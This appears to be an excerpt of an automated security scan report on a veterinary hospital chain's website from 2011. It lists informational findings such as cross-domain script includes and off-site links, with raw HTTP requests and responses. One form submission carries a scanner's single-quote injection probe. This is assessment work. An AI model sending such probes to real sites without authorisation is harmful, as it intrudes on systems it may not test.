http://ad.doubleclick.net/activity;src=1488778;type=iypgu946;cat=freei882;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?
http://www.facebook.com/VCAAnimalHospitals
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1070113585/?label=oR9eCK-p8QEQscai_gM&guid=ON&script=0
https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=ffecoupon&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD
https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=lead&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD

Request

POST /main/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=pias4t8ogigkmu02ec2s4oaee1
Accept-Encoding: gzip, deflate
Content-Length: 491

fname='&lname=Ronald+Smith&addr=3&city=3&state=FL&zip=3&phone=3&email=netsparker%40example.com&other=3&petname=Ronald+Smith&petage=3&variant=3&submit=Get+FREE+Coupon&token=868810f83ce860bcd4cc393ef5f6
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 11572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
       </script>
...[SNIP]...
<div style="display:inline;">
       <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1070113585/?label=oR9eCK-p8QEQscai_gM&guid=ON&script=0"/>
       </div>
...[SNIP]...
<noscript>
       <img src="http://ad.doubleclick.net/activity;src=1451979;type=freef218;cat=freef146;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?" width="1" height="1" alt="">
       </noscript>
...[SNIP]...
<noscript>
       <img src="http://ad.doubleclick.net/activity;src=1488778;type=iypgu946;cat=freei882;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?" width=1 height=1 border=0>
       </noscript>
...[SNIP]...
<noscript>
        <img src="https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=lead&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD" width="1" height="1">
       </noscript>
...[SNIP]...
<noscript>
        <img src="https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=ffecoupon&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD" width="1" height="1">
       </noscript>
...[SNIP]...
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook  <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />
...[SNIP]...

7.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%

The response contains the following links to other domains:

http://vca.unicaondemand.com/ods/js/imodTag.js
http://www.facebook.com/VCAAnimalHospitals

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook  <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />
...[SNIP]...

8. Cross-domain script include previous next
There are 14 instances of this issue:

/favicon.ico
/hanson
/hanson/appt.html
/hanson/offer.html
/main/directory.html
/main/offer
/main/offer/thank-you.html
/manhattan-veterinary-group/appt.html
/marshfield
/marshfield/appt.html
/new-york-veterinary-hospital/appt.html
/plymouth
/plymouth/appt.html
/plymouth/more/boarding.html

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

8.1. http://www.vcahospitals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /favicon.ico HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665

Response

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:03:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

8.2. http://www.vcahospitals.com/hanson previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /hanson HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 11488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

8.3. http://www.vcahospitals.com/hanson/appt.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

8.4. http://www.vcahospitals.com/hanson/offer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

8.5. http://www.vcahospitals.com/main/directory.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/directory.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw

Request

Response

8.6. http://www.vcahospitals.com/main/offer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The response dynamically includes the following scripts from other domains:

http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw

Request

Response

8.7. http://www.vcahospitals.com/main/offer/thank-you.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

Response

8.8. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/manhattan-veterinary-group/appt.html

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:44:45 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

8.9. http://www.vcahospitals.com/marshfield previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/marshfield

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /marshfield HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 11200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

8.10. http://www.vcahospitals.com/marshfield/appt.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/marshfield/appt.html

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
